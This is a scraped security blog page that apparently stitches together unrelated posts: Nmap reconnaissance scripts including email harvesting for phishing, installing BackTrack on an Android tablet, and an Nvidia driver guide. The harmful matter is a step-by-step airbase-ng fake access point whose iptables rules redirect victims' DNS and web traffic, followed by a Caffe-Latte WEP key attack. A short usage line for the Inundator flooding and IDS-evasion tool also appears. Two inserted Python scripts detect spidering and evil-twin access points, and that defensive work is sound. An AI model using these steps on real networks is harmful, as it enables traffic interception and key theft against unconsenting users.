Nmap all scripts

Nmap is a tool that can perform a wide range of activities in a penetration test. The Nmap Scripting Engine (NSE) and the scripts written for it so far turn Nmap into a multi-purpose tool. For example, we can use Nmap during the information gathering stage of a penetration test just by choosing the appropriate scripts. In this article we will examine those scripts and the information they can extract.
One of our first steps can be to determine the origin of the IP address our client has given us. Nmap includes in its database a couple of scripts for this purpose. If we want to run all of them we can use the command shown in the image below:

Nmap – IP Geolocation

As we can see, the script queried an external website (geobytes) in order to determine the coordinates and location of our target.

Whois

The whois command can be run directly from the console on Linux systems. However, there is a dedicated Nmap script that performs the same job and can be used instead. This script returns information about the registrar and contact names.
Nmap – Whois

Email Accounts

Email accounts can also prove important in a penetration test: they can be used as usernames, in social engineering engagements (e.g. phishing attacks), or when we have to conduct brute force attacks against the company's mail server. There are two scripts available for this job:
  • http-google-email
  • http-email-harvest
The http-google-email script uses Google Web and Google Groups search to look for email addresses related to the target host, while http-email-harvest spiders the web server and extracts any email addresses it discovers. http-email-harvest is in the official Nmap repository; http-google-email can be downloaded from here.
Nmap – Discover Email Accounts
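Because http-email-harvest spiders the target web server, its activity is visible from the server side. The Python script below is an added example, not part of the original article: it runs two checks over constructed Apache combined-format log lines. The first looks for the default NSE User-Agent (assumed here to be the http library default, which a scanner can override), the second flags a burst of distinct URLs fetched without a Referer from one address, which is how any link-following crawler looks in the log whatever User-Agent it sends.

```python
import re
from collections import defaultdict
from datetime import datetime

# Default User-Agent of the NSE http library (assumption: the scan did not
# override it via the http.useragent script argument).
NSE_UA_MARKER = "Nmap Scripting Engine"
NSE_UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"

# Constructed sample in Apache "combined" format: one NSE spidering run,
# one ordinary browser session, and one crawler hiding behind a custom User-Agent.
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 2326 "-" "%s"' % NSE_UA,
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /about HTTP/1.1" 200 1482 "-" "%s"' % NSE_UA,
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /contact HTTP/1.1" 200 912 "-" "%s"' % NSE_UA,
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /team HTTP/1.1" 404 512 "-" "%s"' % NSE_UA,
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:09 +0000] "GET /contact HTTP/1.1" 200 912 "http://example.test/" "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:00 +0000] "GET /p1 HTTP/1.1" 200 10 "-" "python-requests/2.31.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:01 +0000] "GET /p2 HTTP/1.1" 200 10 "-" "python-requests/2.31.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:02 +0000] "GET /p3 HTTP/1.1" 200 10 "-" "python-requests/2.31.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:03 +0000] "GET /p4 HTTP/1.1" 404 10 "-" "python-requests/2.31.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:04 +0000] "GET /p5 HTTP/1.1" 200 10 "-" "python-requests/2.31.0"',
    '192.0.2.33 - - [10/Oct/2023:13:57:05 +0000] "GET /p6 HTTP/1.1" 200 10 "-" "python-requests/2.31.0"',
])

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_spidering(log_text, max_paths=5, window_s=10):
    """Map each client IP to the reasons it looks like an automated spider.

    "nse-user-agent": the default NSE User-Agent was seen (strong, but easily changed).
    "burst": at least max_paths distinct URLs were fetched with no Referer
             within window_s seconds, the footprint of a crawler following links.
    """
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        reasons = set()
        if any(NSE_UA_MARKER in r["ua"] for r in recs):
            reasons.add("nse-user-agent")
        recs.sort(key=lambda r: r["time"])
        for i, first in enumerate(recs):
            paths = set()
            for r in recs[i:]:
                if (r["time"] - first["time"]).total_seconds() > window_s:
                    break
                if r["referer"] == "-":
                    paths.add(r["path"])
            if len(paths) >= max_paths:
                reasons.add("burst")
                break
        if reasons:
            findings[ip] = sorted(reasons)
    return findings


if __name__ == "__main__":
    for ip, reasons in detect_spidering(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The thresholds are deliberately conservative; on a busy site tune max_paths and window_s against a day of normal traffic before alerting on the burst rule, and treat the User-Agent match as the high-confidence signal.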

Brute Force DNS Records

DNS records contain a lot of information about a domain that cannot be ignored. Of course there are dedicated tools for brute forcing DNS records that produce better results, but the dns-brute script can also do this job when we want to gather DNS information during our Nmap scans.
Nmap – Brute Forcing DNS

Discovering Additional Hostnames

We can discover additional hostnames hosted on the same IP address with the Nmap script http-reverse-ip. This script helps us find other web applications that exist on the same web server. It is an external script that can be downloaded from here.
Nmap – Reverse IP

Conclusion
In this article we examined some Nmap scripts (internal and external) that can be used during the information gathering stage of a penetration test, before the actual scanning starts. The information we obtained shows that Nmap can perform almost any task with its scripts. If it cannot do something you need, it is time to write your own Lua scripts and contribute them to the community.
Root-Dev on Facebook
Root-Dev Website

Install BackTrack on Android Tablet [Full Tutorial]


First, prepare the tools and the device needed to install Backtrack on an Android tablet.

1. Backtrack 5 ARM.
Download Backtrack 5 ARM from the official Backtrack site. An ARM build exists only for the original Backtrack 5 release; there is no ARM build of Backtrack 5 R1, R2 or R3.

2. Rooted Galaxy Tab 10.1
Why a rooted Galaxy Tab? Because we need to install some applications that require root on Android :-)


3. BusyBox, Superuser, Terminal Emulator and AndroidVNC.
You can search for and download all of them on Google Play. BusyBox provides the standard Unix command-line utilities (its Android app installs and uninstalls them), Superuser manages root rights on Android, Terminal Emulator gives you a Linux command-line shell on Android, and AndroidVNC is a VNC viewer for Android.

How to Install Backtrack on the Android Tablet


1. Extract BT5-GNOME-ARM.7z to a folder, for example a folder named "BT5", and put it in the root directory of the Galaxy Tab's storage.

2. Open Terminal Emulator on the Galaxy Tab and change to the BT5 folder with the following command:
cd sdcard/BT5


3. Then run the following commands and you will see the root@localhost prompt :-)
su
sh bootbt


4. Now let's start the Backtrack GUI by launching the VNC server:
startvnc

5. To connect with a VNC viewer we must know the port VNC is listening on. Run netstat -anpt and note the listening port; in this case it is 5901.


6. Open AndroidVNC and fill in the form like this:
Nickname : BT5
Password : toortoor
Address : 127.0.0.1
Port : 5901

7. Connect and you will see the Backtrack 5 interface :-)


Remember! Some of the Backtrack tools will not work properly, and you do this at your own risk. I hope you can install Backtrack on your Android tablet without any problems; tell me if you run into any.

Fake AP Airbase-ng

In this tutorial I will show you how to set up a simple fake AP with airbase-ng. This can be used for several purposes, for example attacking unassociated clients by making them connect automatically to our AP in the belief that it is their own legitimate AP. The first thing we need to do is start airbase-ng:

Code:
airbase-ng -e BTHomeHub2 -c 1 wlan0
Options:
-e Essid For AP
-c Channel Number
wlan0 Wireless Interface
This will then create a tap device like below

Code:
root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0 
08:15:24  Created tap interface at0
08:15:24  Trying to set MTU on at0 to 1500
08:15:24  Trying to set MTU on wlan0 to 1800
08:15:24  Access Point with BSSID 00:C0:CA:47:32:24 started.
Now that the AP is running, we need to make it possible for clients to obtain an IP address, so let's bring up the tap interface, give it an address and add a route:

Code:
ifconfig at0 up 
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254
Now that the interface is set up for the clients, we need to configure the dhcp3 server a little. Here is my dhcpd.conf:

Code:
ddns-update-style none;        # the original used the old "ad-hoc" style, which newer dhcpd rejects
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 192.168.1.255;
  option routers 192.168.1.254;             # the AP's at0 address
  option domain-name-servers 192.168.1.254; # the original listed the hostname "home", which dhcpd cannot resolve here
  range 192.168.1.1 192.168.1.140;
}
Just add this to the bottom of /etc/dhcp3/dhcpd.conf.
Once it has been entered and saved, the DHCP server can be started:

Code:
/etc/init.d/dhcp3-server start
Now all that is left is to configure the NAT and routing rules for the AP:

Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to-destination 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
Now you should have a fully functional fake AP. If you would like this fake AP to run the Caffe-Latte attack, just add -L -W 1 -x 150 to the airbase-ng command, for example:

Code:
airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
My Output
Code:
root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0 
08:33:13  Created tap interface at0
08:33:13  Trying to set MTU on at0 to 1500
08:33:13  Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32  Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.
airbase-ng Options
-L Caffe-Latte attack
-W 1 set the WEP bit in the beacons (advertise the AP as WEP)
-x number of packets per second to send
-e Essid
-c channel Number
wlan0 wireless interface
The only problem is that I haven't managed to get the Caffe-Latte attack fully working, due to the fact that the only time it captures IVs correctly is when the client reconnects to the AP, so the only way I've had Caffe-Latte working reasonably well is to deauthenticate the client every 10 seconds.
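The airbase-ng output above also shows what this setup looks like from the defender's side: a known ESSID appearing from a BSSID that is not one of ours, on a different channel, and advertising WEP. The Python script below is an added example that is not part of the original post; it checks a batch of observed beacons against an inventory of the access points an organisation actually operates and flags exactly those two signals. The inventory, the neighbour network and the observation format are constructed; only the rogue BSSID is taken from the output above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    """One observed 802.11 beacon, as a wireless IDS or airodump-style tool reports it."""
    ssid: str
    bssid: str
    channel: int
    privacy: str  # "OPEN", "WEP", "WPA", "WPA2" or "WPA3"


# Constructed inventory of the access points we operate (assumption: the
# defender maintains such a list; these names and addresses are made up).
KNOWN_APS = {
    "BTHomeHub2": {"bssids": {"00:11:22:33:44:55"}, "privacy": "WPA2"},
    "CorpGuest": {"bssids": {"00:11:22:33:44:66"}, "privacy": "WPA2"},
}

# Ordering used to decide whether an advertised security mode is weaker than configured.
PRIVACY_RANK = {"OPEN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}


def classify(beacon, known=KNOWN_APS):
    """Return the findings for one beacon; an empty list means nothing suspicious.

    Only SSIDs we own are judged: a neighbour's network is not our concern,
    but our SSID coming from a BSSID we do not operate, or advertised with
    weaker security than we configured, is what an evil twin looks like.
    """
    expected = known.get(beacon.ssid)
    if expected is None:
        return []
    findings = []
    if beacon.bssid.upper() not in {b.upper() for b in expected["bssids"]}:
        findings.append("unknown-bssid")
    if PRIVACY_RANK.get(beacon.privacy.upper(), 0) < PRIVACY_RANK[expected["privacy"]]:
        findings.append("weaker-encryption")
    return findings


def scan_beacons(beacons, known=KNOWN_APS):
    """Map each suspicious BSSID to the sorted findings seen across a batch of beacons."""
    report = {}
    for b in beacons:
        findings = classify(b, known)
        if findings:
            report.setdefault(b.bssid.upper(), set()).update(findings)
    return {bssid: sorted(f) for bssid, f in report.items()}


# Constructed observation window: our real AP, a neighbour, an airbase-ng twin
# of our SSID (BSSID as printed in the output above) on channel 1 with WEP, and
# our guest SSID accidentally left open.
SAMPLE_BEACONS = [
    Beacon("BTHomeHub2", "00:11:22:33:44:55", 6, "WPA2"),
    Beacon("CoffeeShop", "AA:BB:CC:DD:EE:FF", 11, "OPEN"),
    Beacon("BTHomeHub2", "00:c0:ca:47:32:24", 1, "WEP"),
    Beacon("CorpGuest", "00:11:22:33:44:66", 6, "OPEN"),
]


if __name__ == "__main__":
    for bssid, findings in scan_beacons(SAMPLE_BEACONS).items():
        print(bssid, ", ".join(findings))
```

The BSSID check is the one that catches a twin regardless of how faithfully it copies the legitimate ESSID and channel, because airbase-ng transmits with the attacker's own card address unless told otherwise; the encryption check is a cheap extra signal that also catches misconfigured legitimate APs.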

How to add the BackTrack menu on Ubuntu.


Download the menu from: sourceforge.

wHydah Linux Distribution!


Welcome back! My team, AirTeam, has created the new wHydah Linux distribution!
BackTrack WHYDAH Official Forum/Website : http://www.whydah.airteam.org/
Download the new version : http://sourceforge.net/projects/airteam/
Facebook FanPage : https://www.facebook.com/airteam.org
Team AirTeam : Sam Bellamy , Bond Benz , MasterButcher68.
Have fun.

How to install Nvidia Drivers.

Hi, for those who are having trouble installing the Nvidia driver: "DO NOT MESS WITH THE KERNEL OR MODIFY ANYTHING"!
This is the correct way to go:

1) Download Synaptic: apt-get install synaptic.
2) Make sure Software Sources is available under ADMINISTRATION.

DO NOT ACTIVATE ANY UPDATE FROM SOFTWARE SOURCES.

3) Here is the best solution for you (tested and running on an HP G70, GeForce 9200M, Backtrack 5 Gnome 32-bit).

Open a terminal and paste: add-apt-repository ppa:ubuntu-x-swat/x-updates
*** If the system asks whether you want to install "add", answer Y.
Make sure the PPA was added; re-paste the above command if necessary.

Again in the terminal: apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

*** Reboot

Again in the terminal, paste: nvidia-xconfig

*** Reboot again and you're good to go.

Hope this helps.
GD

PS: you might want to fix GRUB; do it this way: nano /etc/default/grub
Scroll down to: #GRUB_GFXMODE=640x480
Uncomment it (take the # off, like this: GRUB_GFXMODE=640x480)
Set the screen resolution according to your screen; mine is 1440x900!
Now hit CTRL+O to write the file out >> Enter, then CTRL+X to exit.
Now in the terminal: update-grub

Good luck.

Tool Inundator Flooder / DDoSer

Name : Tool Inundator (BackTrack 5 R3)
Description : IDS/IPS/WAF Evasion & Flooding


cd /pentest/stressing/inundator

ls

Usage : 
./inundator.pl --verbose --threads 10 <IP>

If you don't have BackTrack 5 R3, download Inundator from:
http://sourceforge.net/projects/inundator/
